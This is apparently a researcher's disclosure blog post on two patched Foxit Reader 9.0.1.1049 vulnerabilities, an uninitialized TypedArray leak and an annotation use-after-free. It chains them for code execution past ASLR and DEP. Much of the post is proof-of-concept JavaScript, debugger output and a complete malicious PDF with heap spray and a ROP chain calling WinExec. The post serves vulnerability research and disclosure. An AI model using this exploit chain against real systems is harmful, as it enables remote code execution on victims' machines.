Foxes Among Us :: Foxit Reader Vulnerability Discovery and Exploitation
After discovering over 100 vulnerabilities in Foxit Reader, I figured it was about time I shared a full exploit chain that defeats ASLR and DEP. The first vulnerability is an uninitialized buffer that I found independently and was later killed by bit from meepwn. I leveraged this for an information leak to defeat ASLR. The second vulnerability is a use-after-free that I found, killed and leveraged for remote code execution.
TL;DR; I walk through exploiting a two different bugs chained together to achieve reliable code execution on a Windows 7 & 10 x86 desktop against Foxit Reader 9.0.1.1049.
Introduction
Foxit Reader and PhantomPDF Reader are marketed as…
…Fast, Affordable & Secure PDF Solutions
However, as Adobe is aware, PDF parsing is a complex task and quite often error prone. Many vulnerabilities have been found inside of clientside PDF parsers and the fact that they need to support JavaScript creates an additional attack surface and greatly facilitates exploitation.
Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
This vulnerability was assigned CVE-2018-9948 and published as ZDI-18-332 by the ZDI. It was discovered by myself and bit from meepwn, however bit beat me too it reporting it to the ZDI. That, unfortunately, is how it rolls sometimes.
Let’s take a look at some poc code. A minimised poc can be see below that will trigger the vulnerability:
var int32View = new Int32Array(0x6c);
app.alert(util.printf("Uninitialized: 0x%04x", int32View[0]));
After enabling page heap, we can see we can read back the (in)famous 0xc0c0c0c0 magic marker of where uninitialized data is.
There are a couple of things to note about this vulnerability. The first thing is that this vulnerability cannot be discovered via traditional fuzzing, since the application will never crash. I built a windbg plugin to help detect these types of vulnerabilities called bridgit. Bridgit is a JavaScript bridge plugin for Foxit Reader that helps facilitate with vulnerability discovery and exploitation.
The other thing to note that all the TypedArray’s are vulnerable with a single allocation (just like the advisory states). We can confirm this by using bridgit.
0:022> !py bridgit -o find_ub -s 0x6c
Bridgit - JavaScript Bridge for Foxit Reader
mr_me 2018
(+) setting up __CIatan_pentium4 bp
(+) setting up __CIasin_pentium4 bp
Breakpoint 0 hit
(+) DEBUG ATAN: (+) enabling heap hook
Breakpoint 2 hit
(+) enabling heap alloc bp
Breakpoint 3 hit
Breakpoint 2 hit
Breakpoint 3 hit
Breakpoint 3 hit
Breakpoint 3 hit
Breakpoint 3 hit
Breakpoint 3 hit
Breakpoint 3 hit
Breakpoint 3 hit
Breakpoint 3 hit
Breakpoint 3 hit
Breakpoint 1 hit
(+) DEBUG ASIN: (+) disabling heap hook
Breakpoint 4 hit
(+) disabling heap alloc bp
(6b4.a60): Break instruction exception - code 80000003 (first chance)
(+) found uninitialized chunk: 0x100bef90
address 100bef90 found in
_DPH_HEAP_ROOT @ 6aa1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
111136b4: 100bef90 6c - 100be000 2000
718e8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
772461fe ntdll!RtlDebugAllocateHeap+0x00000030
7720a0d3 ntdll!RtlpAllocateHeap+0x000000c4
771d58e0 ntdll!RtlAllocateHeap+0x0000023a
028cee12 FoxitReader!CertFreeCertificateChain+0x013a2a32
0117810c FoxitReader+0x0034810c
024d122a FoxitReader!CertFreeCertificateChain+0x00fa4e4a
024d146e FoxitReader!CertFreeCertificateChain+0x00fa508e
024e7943 FoxitReader!CertFreeCertificateChain+0x00fbb563
100bef90 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
100befa0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
100befb0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
100befc0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
100befd0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
100befe0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
100beff0 c0c0c0c0 c0c0c0c0 c0c0c0c0 d0d0d0d0
100bf000 ???????? ???????? ???????? ????????
(+) done!
After trying different TypedArray’s we can see that Int32Array and Float32Array are allocated from exactly the same positions, that is in FoxitReader!CertFreeCertificateChain+0x013a2a32. It’s always good to confirm exactly what was patched!
Exploitation
An uninitialized TypedArray is a very powerful primitive, because we can specify the size of the buffer, thus, we can clobber almost any other buffer that we can allocate and free. For those that are unaware, typical exploitation of an uninitialized buffer can usually be achieved by allocating an object of n size and then freeing that buffer before triggering the uninitialized buffer allocation. Where n is the size of the uninitialized buffer (in our case, basically any size).
After some analysis, I found the perfect candidate and as it turns out, you can allocate an annotation object of size 0x5c, which, when freed is rounded to 0x60.
// allocates the annotation
var a = this.addAnnot({type: "Text"});
// free's the annotation
a.destroy();
Now, we can combine this to leak the vtable of the text annotation.
// allocates the annotation
var a = this.addAnnot({type: "Text"});
// free's the annotation
a.destroy();
// allocate the freed chunk
var test = new ArrayBuffer(0x60);
var int32View = new Int32Array(test);
// mask off the lower word
var leaked = int32View[0] & 0xffff0000;
// calculate an offset for version FoxitReader 9.0.1.1049
var foxit_base = leaked - 0x01f50000;
app.alert(util.printf("FoxitReader base address: 0x%08x", foxit_base));
After turning off page heap and firing the poc, we can see that we are leaking the base address of FoxitReader.exe:
Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
This vulnerability was assigned CVE-2018-9958 and published as ZDI-18-342 by the ZDI. It was discovered by yours trully.
Let’s take a look at some poc code. A minimised poc can be see below that will trigger the vulnerability:
// create an annotation
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
// create an array with an element
var arr = [1];
// make sure we can access the Document object
var that = this;
// setup the getter callback on element 0
Object.defineProperties(arr,{
"0":{
get: function () {
// free the annotation
that.getAnnot(0, "uaf").destroy();
return 1;
}
}
});
// trigger uaf
a.point = arr;
So when setting the point property of a text annotation that is created dynamically and we can trigger a JavaScript callback via a getter call on the first element in an array. In this getter, we can see that we destroy the created annotation, whilst setting a property on that annotation. This triggers the use-after-free and after running it with page heap enabled, we get the following crash:
(31c.f70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1911bfa0 ebx=00000000 ecx=1911bfa0 edx=18b08001 esi=193aaff8 edi=1845ffc8
eip=008ecfb9 esp=03b7e814 ebp=03b7e82c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
FoxitReader!CertFreeCertificateChain+0x150bd9:
008ecfb9 8b01 mov eax,dword ptr [ecx] ds:0023:1911bfa0=????????
0:000> u . L4
FoxitReader!CertFreeCertificateChain+0x150bd9:
008ecfb9 8b01 mov eax,dword ptr [ecx]
008ecfbb 8b5008 mov edx,dword ptr [eax+8]
008ecfbe 56 push esi
008ecfbf ffd2 call edx
This is classic use-after-free with a vtable call, so all we really need to do it control the allocation. We already know that we can disclose memory locations.
Exploitation
We can disable page heap and set a breakpoint at the crash location to find the size of the freed object.
0:018> bp FoxitReader!CertFreeCertificateChain+0x150bd9
0:018> g
Breakpoint 0 hit
eax=075619a8 ebx=00000000 ecx=075619a8 edx=37c08001 esi=076d87f8 edi=076d8de8
eip=014bcfb9 esp=0026e284 ebp=0026e29c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
FoxitReader!CertFreeCertificateChain+0x150bd9:
014bcfb9 8b01 mov eax,dword ptr [ecx] ds:0023:075619a8=02bc0147
0:000> !heap -p -a @ecx
address 075619a8 found in
_HEAP @ 6c0000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
075619a0 000d 0000 [00] 075619a8 00060 - (free)
We can see that the object is of size 0x60 and we can use a TypedArray to take control just after the free.
function reclaim(){
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
for (var j = 0; j < rop.length; j++) {
rop[j] = 0x41414141;
}
}
}
// create an annotation
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
// create an array with an element
var arr = [1];
// make sure we can access the Document object
var that = this;
// setup the getter callback on element 0
Object.defineProperties(arr,{
"0":{
get: function () {
// free the annotation
that.getAnnot(0, "uaf").destroy();
// reclaim the freed object
reclaim();
return 1;
}
}
});
// trigger uaf
a.point = arr;
Just after the destroy() we call reclaim() which will allocate 0x10 TypedArray’s of size 0x60. We do an iteration of 0x10 just to be extra sure we catch the freed object before its re-use. After re-running the updated poc, sure enough, we replaced the freed object and have execution control.
(df8.16b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000000 ecx=073419a8 edx=24508001 esi=074a8068 edi=074a4270
eip=014bcfbb esp=0012e3cc ebp=0012e3e4 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
FoxitReader!CertFreeCertificateChain+0x150bdb:
014bcfbb 8b5008 mov edx,dword ptr [eax+8] ds:0023:41414149=????????
0:000> dd @ecx
073419a8 41414141 41414141 41414141 41414141
073419b8 41414141 41414141 41414141 41414141
073419c8 41414141 41414141 41414141 41414141
073419d8 41414141 41414141 41414141 41414141
073419e8 41414141 41414141 41414141 41414141
073419f8 41414141 41414141 41414141 41414141
07341a08 58c64fcb 8c000000 00000001 00000026
07341a18 00000027 003a005a 0072005c 00730065
At this point (get it, point?) there was a few different ways we could chain the vulnerabilities. What we need to do now is get some data we control into memory at a known address. Traditionally, this is with a heap spray and a predictable address that we can spray at. However, after pondering a little more it occured to me that we can avoid a heap spray entirely.
What I had to do was leak a heap chunk pointer from the text annotation which was (ab)used for the uninitialized TypedArray. Then, reclaim that memory with a TypeArray, setting its contents to a stack pivot and setting the reclaimed object’s fake vtable to this leaked address, thus avoiding a heap spray. Surprisingly, this worked with 100% success rate. You can download the full exploit that works on both Windows 7 and 10 (at the time) here. I also developed an additional poc with a heap spray just incase the heap chunk leak would fail.
This poc only worked on Windows 7:
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
var heap_ptr = 0;
var foxit_base = 0;
function heap_spray(size){
var arr = new Array(size);
for (var i = 0; i < arr.length; i++) {
// re-claim and stack pivot
arr[i] = new ArrayBuffer(0x10000-0x8);
var claimed = new Int32Array(arr[i]);
for (var j = 0; j < claimed.length; j++) {
// stack pivot from FoxitReader.exe v9.0.1.1049 (sha1: a01a5bde0699abda8294d73544a1ec6b4115fa68)
claimed[j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
}
}
}
function leak(){
/*
Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
Found By: bit from meepwn team
*/
// alloc
var a = this.addAnnot({type: "Text"});
// free
a.destroy();
// reclaim
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
// leak the vftable
var leaked = stolen[0] & 0xffff0000;
// a hard coded offset to FoxitReader.exe base v9.0.1.1049 (sha1: a01a5bde0699abda8294d73544a1ec6b4115fa68)
foxit_base = leaked-0x01f50000;
}
function reclaim(){
/*
This function reclaims the freed chunk, so we can get rce and I do it a few times for reliability.
All gadgets are from FoxitReader.exe v9.0.1.1049 (sha1: a01a5bde0699abda8294d73544a1ec6b4115fa68)
*/
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
rop[0x00] = 0x11000048; // pointer to our stack pivot from the heap spray
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
rop[0x02] = 0x72727272; // junk
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
rop[0x04] = 0xffffffff; // ret of WinExec
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
rop[0x0a] = foxit_base + 0x0041c6ca; // ret
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
rop[0x0c] = 0x636c6163; // calc
rop[0x0d] = 0x00000000; // adios, amigo
for (var j = 0x0e; j < rop.length; j++) {
rop[j] = 0x71727374;
}
}
}
function trigger_uaf(){
/*
Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
Found By: Steven Seeley (mr_me) of Source Incite
*/
var that = this;
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
var arr = [1];
Object.defineProperties(arr,{
"0":{
get: function () {
// free
that.getAnnot(0, "uaf").destroy();
// reclaim freed memory
reclaim();
return 1;
}
}
});
a.point = arr;
}
leak();
heap_spray(0x800);
trigger_uaf();
)>> trailer <</Root 1 0 R>>
The final exploit just uses a WinExec call and doesn’t bother to modify memory, since many third party malware protection tools look for memory modification techniques I was lazy. I did see a LoadLibraryW in FoxitReader’s IAT, hint hint.
I didn’t bother with continue of execution (CoE) since I don’t work for an offense company anymore but all you would need to do is save the registers before the chain, return back to the stack after WinExec and restore the registers again, including the stack. FoxitReader.exe is 55MB in size, so finding ROP gadgets is a piece of cake for all of this. Anyway, on to the show!
Timeline
- 2018-03-01 – Verified and sent to the ZDI
- 2018-03-24 – Vulnerability acquired
- 2018-03-30 – Vendor disclosure
- 2018-04-20 – Patched and disclosed
Conclusion
Foxit Reader still has relatively little protections against memory corruption vulnerabilities. The developers rely heavily on operating system mitigations. When you have a JavaScript attack surface, you best believe that operating system mitigations are not enough, application level mitigations such as control flow guard, isolated heap and a decent sandbox would have significantly impacted me in the development of this exploit.
TypeArray’s are simply too powerful againt most software products and facilitated immensely in the final exploit. They were used for the information disclosure (both .data and .text addresses), the heap spray and the object replacement.
References
- https://www.zerodayinitiative.com/advisories/ZDI-18-332/
- https://www.zerodayinitiative.com/advisories/ZDI-18-342/
- https://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf
- https://github.com/saelo/foxpwn/blob/master/code.js#L297
- https://github.com/saaramar/Deterministic_LFH